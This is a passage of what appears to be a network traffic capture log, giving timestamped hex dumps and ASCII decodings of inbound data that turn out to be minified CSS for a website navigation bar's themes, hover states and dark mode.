                                                                                                                                                                        2023-06-02 11:13:21 UTC353INData Raw: 6f 72 6d 61 6c 7d 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 3a 63 68 65 63 6b 65 64 7e 2e 5f 79 62 5f 31 64 6d 7a 61 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 5f 79 62 5f 31 30 70 71 31 20 2e 32 35 73 7d 40 6b 65 79 66 72 61 6d 65 73 20 5f 79 62 5f 31 30 70 71 31 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 2e 5f 79 62 5f 31 71 7a 78 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 38 64 61 64 65 3b 62 6f 78 2d 73 68 61 64
                                                                                                                                                                        Data Ascii: ormal}input[type=checkbox]:checked~._yb_1dmza{visibility:visible;animation:_yb_10pq1 .25s}@keyframes _yb_10pq1{0%{opacity:0}to{opacity:1}}._yb_1qzxw{background-color:#fff;background-color:var(--yb-white);border-radius:4px;border:1px solid #d8dade;box-shad
                                                                                                                                                                        2023-06-02 11:13:21 UTC355INData Raw: 63 68 20 2e 5f 79 62 5f 78 6a 79 39 68 3a 68 6f 76 65 72 20 2e 5f 79 62 5f 31 76 34 6d 32 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 78 6a 79 39 68 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 38 66 61 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 6d 61 72 73 68 6d 61 6c 6c 6f 77 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 33 36 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 78 6a 79 39 68 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 30 65 34 65 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 3b 62
                                                                                                                                                                        Data Ascii: ch ._yb_xjy9h:hover ._yb_1v4m2{opacity:1}.ybar-ytheme-crunch ._yb_xjy9h:hover{background:#f5f8fa;background:var(--yb-marshmallow);border-radius:100px;height:36px}.ybar-ytheme-crunch ._yb_xjy9h:active{background:#e0e4e9;background:var(--yb-dirty-seagull);b
                                                                                                                                                                        2023-06-02 11:13:21 UTC356INData Raw: 2d 6c 65 66 74 3a 36 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 35 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 31 78 6c 38 69 7b 6c 65 66 74 3a 32 31 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 78 72 7a 79 39 20 2e 5f 79 62 5f 31 78 6c 38 69 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 78 72 7a 79 39 2e 5f 79 62 5f 6b 70 7a 39 73 20 2e 5f 79 62 5f 31 78 6c 38 69 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 5f 79 62 5f 31 74 6b 71 34 20 2e 5f 79 62 5f 31 78 6c 38 69 7b 62 61 63 6b 67 72
                                                                                                                                                                        Data Ascii: -left:6px;padding-right:5px;position:absolute;top:-5px;visibility:hidden;width:auto}.ybar-ytheme-crunch ._yb_1xl8i{left:21px}.ybar-ytheme-fuji2 ._yb_xrzy9 ._yb_1xl8i,.ybar-ytheme-fuji2 ._yb_xrzy9._yb_kpz9s ._yb_1xl8i{opacity:1}._yb_1tkq4 ._yb_1xl8i{backgr
                                                                                                                                                                        2023-06-02 11:13:21 UTC357INData Raw: 74 3a 34 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 79 62 2d 66 6f 6e 74 2d 72 65 67 75 6c 61 72 29 3b 77 69 64 74 68 3a 33 30 30 70 78 3b 72 69 67 68 74 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 6c 69 6e 65 61 72 20 2e 34 73 2c 6d 61 78 2d 68 65 69 67 68 74 20 30 73 20 6c 69 6e 65 61 72 20 2e 34 73 2c 6f 70 61 63 69 74 79 20 2e 31 35 73 20 6c 69 6e 65 61 72 20 2e 34 73 3b 74 6f 70 3a 33 33 70 78 7d 2e 5f 79 62 5f 75 71 32 69 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 33 35 20 34 32 20 34 39 2f 38 30 25 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 30 20
                                                                                                                                                                        Data Ascii: t:400;font-weight:var(--yb-font-regular);width:300px;right:0;opacity:0;transition:visibility 0s linear .4s,max-height 0s linear .4s,opacity .15s linear .4s;top:33px}._yb_uq2ie{background-color:rgb(35 42 49/80%);border-radius:8px;box-shadow:0 0 1px rgba(0
                                                                                                                                                                        2023-06-02 11:13:21 UTC357INData Raw: 78 20 38 70 78 20 72 67 62 61 28 30 20 30 20 30 2f 31 30 25 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 79 62 2d 66 6f 6e 74 2d 72 65 67 75 6c 61 72 29 3b 72 69 67 68 74 3a 2d 31 32 70 78 3b 6f 70 61 63 69 74 79 3a 30 3b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 34 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 76 69 73 69 62 69 6c 69 74 79 20 30 73 20 6c 69 6e 65 61 72 20 2e 34 73 3b 74 6f 70 3a 34 32 70 78 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 33 30 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 5f 79 62 5f 62 79 34 66 63 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 3b 6d 61 72 67 69
                                                                                                                                                                        Data Ascii: x 8px rgba(0 0 0/10%);font-weight:400;font-weight:var(--yb-font-regular);right:-12px;opacity:0;padding:8px 14px;transition:visibility 0s linear .4s;top:42px;pointer-events:none;width:30px;visibility:hidden}._yb_by4fc{color:#fff;color:var(--yb-white);margi
                                                                                                                                                                        2023-06-02 11:13:21 UTC359INData Raw: 3a 31 70 78 20 73 6f 6c 69 64 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 30 31 64 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 67 72 61 70 65 2d 6a 65 6c 6c 79 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 20 2d 31 70 78 20 30 7d 2e 5f 79 62 5f 31 35 30 7a 69 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 5f 79 62 5f 31 32 7a 68 34 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61
                                                                                                                                                                        Data Ascii: :1px solid;color:#fff;color:var(--yb-white);background-color:#6001d2;background-color:var(--yb-grape-jelly);border-color:transparent;margin:-1px -1px 0}._yb_150zi:hover{text-decoration:none}._yb_12zh4{padding-bottom:16px;color:#232a31;color:var(--yb-batca
                                                                                                                                                                        2023-06-02 11:13:21 UTC360INData Raw: 73 6f 6c 69 64 20 23 65 30 65 34 65 39 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 79 62 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 7d 2e 5f 79 62 5f 31 76 70 34 77 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 3b 70 61 64 64 69 6e 67 3a 31 36 70 78 20 32 30 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5f 79 62 5f 71 73 65 39 74 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 32 35 39 62 32 7d 2e 5f 79 62 5f 31 73 74 73 38 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 38 66 61 3b 62 61 63 6b 67 72
                                                                                                                                                                        Data Ascii: solid #e0e4e9;border-top:1px solid var(--yb-dirty-seagull)}._yb_1vp4w{text-decoration:none;color:#232a31;color:var(--yb-batcave);padding:16px 20px;display:block}._yb_qse9t{text-decoration:none;color:#2259b2}._yb_1sts8:hover{background-color:#f5f8fa;backgr
                                                                                                                                                                        2023-06-02 11:13:21 UTC361INData Raw: 72 6b 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 78 6a 79 39 68 3a 68 6f 76 65 72 20 73 76 67 20 70 61 74 68 7b 73 74 72 6f 6b 65 3a 23 39 30 37 63 66 66 3b 73 74 72 6f 6b 65 3a 76 61 72 28 2d 2d 79 62 2d 74 68 61 6e 6f 73 29 7d 2e 79 62 61 72 2d 64 61 72 6b 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 78 6a 79 39 68 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 33 32 61 33 31 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 70 78 7d 2e 79 62 61 72 2d 64 61 72 6b 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 78 6a 79 39 68 20 2e 5f 79 62 5f 31 76 34 6d
                                                                                                                                                                        Data Ascii: rk .ybar-ytheme-crunch ._yb_xjy9h:hover svg path{stroke:#907cff;stroke:var(--yb-thanos)}.ybar-dark .ybar-ytheme-crunch ._yb_xjy9h:hover{background:#232a31;background:var(--yb-batcave);border-radius:100px}.ybar-dark .ybar-ytheme-crunch ._yb_xjy9h ._yb_1v4m
                                                                                                                                                                        2023-06-02 11:13:21 UTC362INData Raw: 20 76 61 72 28 2d 2d 79 62 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 73 63 72 6f 6c 6c 62 61 72 2d 77 69 64 74 68 3a 6e 6f 6e 65 7d 2e 79 62 61 72 2d 70 72 6f 70 65 72 74 79 2d 73 70 6f 72 74 73 20 23 79 62 61 72 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 5f 79 62 5f 31 72 79 78 6d 2e 5f 79 62 5f 33 64 64 6c 6f 20 2e 5f 79 62 5f 31 39 7a 30 70 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2c 2e 79 62 61 72 2d 70 72 6f 70 65 72 74 79 2d 73 70 6f 72 74 73 20 23 79 62 61 72 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 5f 79 62 5f 31 72 79 78 6d 2e 5f 79 62 5f 33 64 64 6c 6f 20 2e 5f 79 62 5f 31 6b 69 6b 78 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 7b 64 69 73 70 6c
                                                                                                                                                                        Data Ascii: var(--yb-dirty-seagull);-ms-overflow-style:none;scrollbar-width:none}.ybar-property-sports #ybar-navigation ._yb_1ryxm._yb_3ddlo ._yb_19z0p::-webkit-scrollbar,.ybar-property-sports #ybar-navigation ._yb_1ryxm._yb_3ddlo ._yb_1kikx::-webkit-scrollbar{displ
                                                                                                                                                                        2023-06-02 11:13:21 UTC364INData Raw: 62 5f 6e 6a 73 6a 77 20 2e 5f 79 62 5f 68 6a 73 63 66 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 30 70 78 7d 2e 5f 79 62 5f 70 32 37 62 62 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 37 70 78 7d 2e 5f 79 62 5f 70 32 37 62 62 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 35 61 36 33 36 63 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 31 36 70 78 20 39 70 78 7d 2e 79 62 61 72 2d
                                                                                                                                                                        Data Ascii: b_njsjw ._yb_hjscf{margin-left:-20px}._yb_p27bb:first-child{margin-left:0;margin-bottom:7px}._yb_p27bb{display:flex;flex-direction:column;margin:0;font-size:0;line-height:24px;text-align:center;color:#5a636c;white-space:nowrap;padding:12px 16px 9px}.ybar-
                                                                                                                                                                        2023-06-02 11:13:21 UTC365INData Raw: 78 30 2e 5f 79 62 5f 31 65 34 62 78 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 6c 69 76 78 30 2e 5f 79 62 5f 31 65 34 62 78 2b 2e 5f 79 62 5f 6c 69 76 78 30 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 6c 69 76 78 30 2c 2e 79 62 61 72 2d 64 61 72 6b 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 6c 69 76 78 30 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a
                                                                                                                                                                        Data Ascii: x0._yb_1e4bx{display:block}._yb_p27bb ._yb_livx0._yb_1e4bx+._yb_livx0{display:none}html[data-color-theme-enabled][data-color-scheme=dark] ._yb_p27bb ._yb_livx0,.ybar-dark ._yb_p27bb ._yb_livx0{color:#fff;color:var(--yb-white)}@media (prefers-color-scheme:
                                                                                                                                                                        2023-06-02 11:13:21 UTC366INData Raw: 33 36 61 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 74 6c 65 73 68 69 70 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 6c 69 76 78 30 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 6c 69 76 78 30 2e 5f 79 62 5f 31 73 76 64 6f 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 31 6f 62 64 70 20 2e
                                                                                                                                                                        Data Ascii: 36a;color:var(--yb-battleship)}.ybar-ytheme-crunch ._yb_p27bb ._yb_livx0:hover{color:#232a31;color:var(--yb-batcave)}.ybar-ytheme-crunch ._yb_p27bb ._yb_livx0._yb_1svdo{font-weight:700;color:#232a31;color:var(--yb-batcave)}.ybar-ytheme-crunch ._yb_1obdp .
                                                                                                                                                                        2023-06-02 11:13:21 UTC368INData Raw: 75 74 6f 7d 2e 5f 79 62 5f 75 78 68 61 37 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 6c 61 73 73 69 63 20 2e 5f 79 62 5f 75 78 68 61 37 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 39 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 79 62 61 72 2d 79 74 68
                                                                                                                                                                        Data Ascii: uto}._yb_uxha7{font-size:22px;margin-right:8px;line-height:18px}.ybar-ytheme-classic ._yb_uxha7{display:inline-block;font-weight:500;margin-right:9px;overflow:visible;text-align:center;text-decoration:none;vertical-align:middle;position:relative}.ybar-yth
                                                                                                                                                                        2023-06-02 11:13:21 UTC369INData Raw: 66 74 2d 6d 6f 72 65 2d 6d 65 6e 75 2e 5f 79 62 5f 39 32 6f 32 6a 20 2e 5f 79 62 5f 68 6a 73 63 66 2c 2e 79 62 61 72 2d 73 68 69 66 74 2d 6d 6f 72 65 2d 6d 65 6e 75 2e 5f 79 62 5f 73 68 70 37 77 20 2e 5f 79 62 5f 68 6a 73 63 66 7b 74 6f 70 3a 33 38 70 78 7d 2e 5f 79 62 5f 31 37 6a 66 38 7b 2d 6d 6f 7a 2d 63 6f 6c 75 6d 6e 2d 63 6f 75 6e 74 3a 32 3b 63 6f 6c 75 6d 6e 2d 63 6f 75 6e 74 3a 32 7d 2e 5f 79 62 5f 66 69 6e 5f 63 6c 2d 33 7b 2d 6d 6f 7a 2d 63 6f 6c 75 6d 6e 2d 63 6f 75 6e 74 3a 33 3b 63 6f 6c 75 6d 6e 2d 63 6f 75 6e 74 3a 33 7d 2e 5f 79 62 5f 66 69 6e 5f 63 6c 2d 34 7b 2d 6d 6f 7a 2d 63 6f 6c 75 6d 6e 2d 63 6f 75 6e 74 3a 34 3b 63 6f 6c 75 6d 6e 2d 63 6f 75 6e 74 3a 34 7d 2e 5f 79 62 5f 66 69 6e 5f 63 6c 2d 35 7b 2d 6d 6f 7a 2d 63 6f 6c 75 6d 6e
                                                                                                                                                                        Data Ascii: ft-more-menu._yb_92o2j ._yb_hjscf,.ybar-shift-more-menu._yb_shp7w ._yb_hjscf{top:38px}._yb_17jf8{-moz-column-count:2;column-count:2}._yb_fin_cl-3{-moz-column-count:3;column-count:3}._yb_fin_cl-4{-moz-column-count:4;column-count:4}._yb_fin_cl-5{-moz-column
                                                                                                                                                                        2023-06-02 11:13:21 UTC370INData Raw: 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 36 37 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 23 31 30 31 35 31 38 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 6d 69 64 6e 69 67 68 74 29 7d 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 31 63 6a 6b 65 20 2e 5f 79 62 5f 6c 69 76 78 30 2c 2e 79 62 61 72 2d 64 61 72 6b 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 31 63 6a 6b 65 20 2e 5f 79 62 5f 6c 69 76 78 30 7b 63 6f 6c 6f 72 3a 23 62 39 62 64 63 35 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f
                                                                                                                                                                        Data Ascii: t-weight:400;line-height:1.67;letter-spacing:normal;color:#101518;color:var(--yb-midnight)}html[data-color-theme-enabled][data-color-scheme=dark] ._yb_p27bb ._yb_1cjke ._yb_livx0,.ybar-dark ._yb_p27bb ._yb_1cjke ._yb_livx0{color:#b9bdc5}@media (prefers-co
                                                                                                                                                                        2023-06-02 11:13:21 UTC371INData Raw: 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 33 64 64 6c 6f 3a 6e 6f 74 28 2e 5f 79 62 5f 72 6f 75 35 77 29 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 31 63 6a 6b 65 20 2e 5f 79 62 5f 6c 69 76 78 30 20 64 69 76 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 6d 61 78 2d 77 69 64 74 68 3a 31 36 32 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 33 64 64 6c 6f 3a 6e 6f 74 28 2e 5f 79 62 5f 72 6f 75 35 77 29 20 2e 5f 79 62 5f 6f 77 2d 32 7b 77 69 64 74 68 3a 33 33 32 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 33 64 64 6c 6f 3a 6e 6f 74 28 2e 5f 79
                                                                                                                                                                        Data Ascii: me-crunch ._yb_3ddlo:not(._yb_rou5w) ._yb_p27bb ._yb_1cjke ._yb_livx0 div{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;max-width:162px}.ybar-ytheme-crunch ._yb_3ddlo:not(._yb_rou5w) ._yb_ow-2{width:332px}.ybar-ytheme-crunch ._yb_3ddlo:not(._y
                                                                                                                                                                        2023-06-02 11:13:21 UTC373INData Raw: 5f 6c 69 76 78 30 3a 66 6f 63 75 73 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 7d 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 31 63 6a 6b 65 20 61 2e 5f 79 62 5f 6c 69 76 78 30 3a 66 6f 63 75 73 2c 2e 79 62 61 72 2d 64 61 72 6b 20 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 31 63 6a 6b 65 20 61 2e 5f 79 62 5f 6c 69 76 78 30 3a 66 6f 63 75 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 2e
                                                                                                                                                                        Data Ascii: _livx0:focus:before{background:#fff;background:var(--yb-white)}html[data-color-theme-enabled][data-color-scheme=dark] ._yb_p27bb ._yb_1cjke a._yb_livx0:focus,.ybar-dark ._yb_p27bb ._yb_1cjke a._yb_livx0:focus{color:#fff;color:var(--yb-white);text-shadow:.
                                                                                                                                                                        2023-06-02 11:13:21 UTC374INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 33 33 33 61 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 73 77 65 64 69 73 68 2d 66 69 73 68 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 23 66 66 33 33 33 61 2c 23 66 66 30 30 62 61 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 76 61 72 28 2d 2d 79 62 2d 73 77 65 64 69 73 68 2d 66 69 73 68 29 2c 23 66 66 30 30 62 61 29 3b 70 61 64 64 69 6e 67 3a 30 20 32 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 39 70 78 7d 2e 5f 79 62 5f 70 32 37 62 62 20 2e 5f 79 62 5f 6c 69 76 78 30 3a 68 6f 76 65 72 20 2e 5f 79 62 5f 66 75 68 66 39 7b 74 65 78 74 2d 64
                                                                                                                                                                        Data Ascii: ;background:#ff333a;background:var(--yb-swedish-fish);background:linear-gradient(180deg,#ff333a,#ff00ba);background:linear-gradient(180deg,var(--yb-swedish-fish),#ff00ba);padding:0 2px;width:auto;font-size:9px}._yb_p27bb ._yb_livx0:hover ._yb_fuhf9{text-d
                                                                                                                                                                        2023-06-02 11:13:21 UTC375INData Raw: 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 20 2e 5f 79 62 5f 31 71 7a 78 77 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 33 32 61 33 31 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 3b 62 6f 72 64 65 72 3a 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 34 70 78 20 38 70 78 20 30 20 72 67 62 28 30 20 30 20 30 2f 39 25 29 2c 30 20 30 20 31 70 78 20 30 20 72 67 62 28 30 20 30 20 30 2f 39 25 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 7d 2e 5f 79 62 5f 78 63 37 6d 61 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 76 61 72 28 2d 2d 79 62 2d 66
